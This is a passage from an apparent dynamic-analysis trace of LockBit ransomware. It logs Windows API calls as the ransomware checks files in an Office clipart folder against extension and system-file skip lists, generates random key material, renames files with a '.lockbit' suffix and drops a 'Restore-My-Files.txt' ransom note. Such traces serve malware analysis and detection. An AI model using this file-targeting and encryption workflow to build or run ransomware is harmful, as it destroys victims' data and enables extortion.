cAlternateFileName="")) returned 1 [0114.173] lstrcmpiW (lpString1=".", lpString2="FD00438_.WMF") returned -1 [0114.173] lstrcmpiW (lpString1="..", lpString2="FD00438_.WMF") returned -1 [0114.173] PathFindExtensionW (pszPath="FD00438_.WMF") returned=".WMF" [0114.173] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0114.173] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0114.173] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0114.173] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0114.173] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0114.173] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0114.173] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0114.173] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0114.173] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0114.173] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0114.173] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0114.173] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0114.173] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0114.173] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0114.173] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0114.174] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0114.174] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0114.174] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0114.174] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0114.174] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0114.174] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0114.174] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0114.174] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0114.174] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0114.174] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.174] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0114.174] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0114.174] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0114.174] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0114.174] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0114.174] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0114.174] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0114.174] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0114.174] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0114.174] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0114.174] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0114.175] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0114.175] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0114.175] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0114.175] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0114.175] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0114.175] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0114.175] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.175] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0114.175] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0114.175] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0114.175] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0114.175] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD00438_.WMF") returned 1 [0114.175] lstrcmpiW (lpString1="ntldr", lpString2="FD00438_.WMF") returned 1 [0114.175] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD00438_.WMF") returned 1 [0114.175] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD00438_.WMF") returned -1 [0114.175] lstrcmpiW (lpString1="autorun.inf", lpString2="FD00438_.WMF") returned -1 [0114.175] lstrcmpiW (lpString1="thumbs.db", lpString2="FD00438_.WMF") returned 1 [0114.175] lstrcmpiW (lpString1="iconcache.db", lpString2="FD00438_.WMF") returned 1 [0114.175] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0114.175] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF") returned=".WMF" [0114.176] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0114.176] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0114.176] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0114.176] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0114.176] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0114.176] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0114.176] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0114.176] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0114.176] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0114.176] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0114.176] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0114.176] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0114.176] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0114.176] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0114.176] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0114.176] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0114.176] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0114.176] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0114.176] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0114.176] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0114.176] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0114.177] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0114.177] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0114.177] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0114.177] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0114.177] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0114.177] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0114.177] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0114.177] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF.lockbit") returned 72 [0114.177] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00438_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0114.178] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0114.178] malloc (_Size=0x40068) returned 0x3db04c0 [0114.179] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3db04d8 | out: lpFileSize=0x3db04d8*=5098) returned 1 [0114.179] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.180] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.180] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df04f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df04f4) returned 0x0 [0114.180] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.180] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.180] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df0504, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df0504) returned 0x0 [0114.180] ReadFile (in: hFile=0x3bc, lpBuffer=0x3db04f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0) returned 1 [0114.187] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0114.187] malloc (_Size=0xa6) returned 0x77d7a8 [0114.187] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0114.188] free (_Block=0x77d7a8) [0114.188] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00438_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0114.188] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0114.188] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0114.188] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa4d9a300, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x52290670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa4d9a300, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x22de, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD00455_.WMF", cAlternateFileName="")) returned 1 [0114.188] lstrcmpiW (lpString1=".", lpString2="FD00455_.WMF") returned -1 [0114.189] lstrcmpiW (lpString1="..", lpString2="FD00455_.WMF") returned -1 [0114.189] PathFindExtensionW (pszPath="FD00455_.WMF") returned=".WMF" [0114.189] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0114.189] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0114.189] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0114.189] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0114.189] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0114.189] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0114.189] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0114.189] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0114.189] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0114.189] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0114.189] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0114.189] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0114.189] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0114.190] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0114.190] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0114.190] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0114.190] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0114.190] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0114.190] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0114.190] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0114.190] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0114.190] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0114.190] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0114.190] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0114.190] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.190] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0114.190] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0114.190] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0114.190] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0114.190] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0114.190] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0114.190] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0114.191] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0114.191] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0114.191] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0114.191] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0114.191] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0114.191] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0114.191] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0114.191] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0114.191] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0114.191] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0114.191] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.191] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0114.191] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0114.191] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0114.191] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0114.191] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD00455_.WMF") returned 1 [0114.191] lstrcmpiW (lpString1="ntldr", lpString2="FD00455_.WMF") returned 1 [0114.191] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD00455_.WMF") returned 1 [0114.191] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD00455_.WMF") returned -1 [0114.192] lstrcmpiW (lpString1="autorun.inf", lpString2="FD00455_.WMF") returned -1 [0114.192] lstrcmpiW (lpString1="thumbs.db", lpString2="FD00455_.WMF") returned 1 [0114.192] lstrcmpiW (lpString1="iconcache.db", lpString2="FD00455_.WMF") returned 1 [0114.192] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0114.192] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF") returned=".WMF" [0114.192] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0114.192] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0114.192] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0114.192] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0114.192] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0114.192] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0114.192] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0114.192] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0114.192] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0114.192] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0114.192] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0114.192] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0114.192] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0114.192] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0114.193] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0114.193] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0114.193] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0114.193] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0114.193] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0114.193] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0114.193] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0114.193] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0114.193] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0114.193] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0114.193] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0114.193] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0114.193] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0114.193] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0114.193] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF.lockbit") returned 72 [0114.193] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\fd00455_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0114.194] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0114.194] malloc (_Size=0x40068) returned 0x3ef0008 [0114.194] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=8926) returned 1 [0114.194] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.195] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.195] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0114.195] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0114.195] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0114.195] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3004c) returned 0x0 [0114.196] ReadFile (in: hFile=0x2f4, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0114.217] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0114.217] malloc (_Size=0xa6) returned 0x77d7a8 [0114.217] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0114.218] free (_Block=0x77d7a8) [0114.218] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00455_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0114.218] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0114.218] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0114.218] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa3a87600, ftCreationTime.dwHighDateTime=0x1bd4ae3, ftLastAccessTime.dwLowDateTime=0x52290670, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa3a87600, ftLastWriteTime.dwHighDateTime=0x1bd4ae3, nFileSizeHigh=0x0, nFileSizeLow=0x43fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="FD00459_.WMF", cAlternateFileName="")) returned 1 [0114.219] lstrcmpiW (lpString1=".", lpString2="FD00459_.WMF") returned -1 [0114.219] lstrcmpiW (lpString1="..", lpString2="FD00459_.WMF") returned -1 [0114.219] PathFindExtensionW (pszPath="FD00459_.WMF") returned=".WMF" [0114.219] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0114.219] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0114.219] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0114.219] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0114.219] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0114.219] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0114.219] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0114.219] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0114.219] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0114.219] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0114.219] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0114.219] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0114.219] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0114.219] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0114.219] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0114.219] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0114.219] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0114.219] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0114.220] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0114.220] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0114.220] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0114.220] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0114.220] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0114.220] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0114.220] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.220] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0114.220] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0114.220] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0114.220] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0114.220] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0114.220] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0114.220] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0114.220] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0114.220] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0114.220] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0114.220] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0114.220] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0114.220] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0114.220] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0114.220] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0114.221] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0114.221] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0114.221] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0114.221] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0114.221] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0114.221] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0114.221] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0114.221] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="FD00459_.WMF") returned 1 [0114.221] lstrcmpiW (lpString1="ntldr", lpString2="FD00459_.WMF") returned 1 [0114.221] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="FD00459_.WMF") returned 1 [0114.221] lstrcmpiW (lpString1="bootsect.bak", lpString2="FD00459_.WMF") returned -1 [0114.221] lstrcmpiW (lpString1="autorun.inf", lpString2="FD00459_.WMF") returned -1 [0114.221] lstrcmpiW (lpString1="thumbs.db", lpString2="FD00459_.WMF") returned 1 [0114.221] lstrcmpiW (lpString1="iconcache.db", lpString2="FD00459_.WMF") returned 1 [0114.221] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0114.221] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD00459_.WMF") returned=".WMF" [0114.221] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0114.221] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0114.221] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0114.221] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0114.222] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0114.222] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0114.222] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0114.222] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0114.222] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0114.222] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0114.222] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0114.222] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0114.222] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0114.222] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0114.222] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0114.222] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0114.222] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0114.222] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0114.222] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0114.222] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0114.222] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0114.222] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0114.222] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0114.222] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0114.222] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0114.222] lstrcmpiW 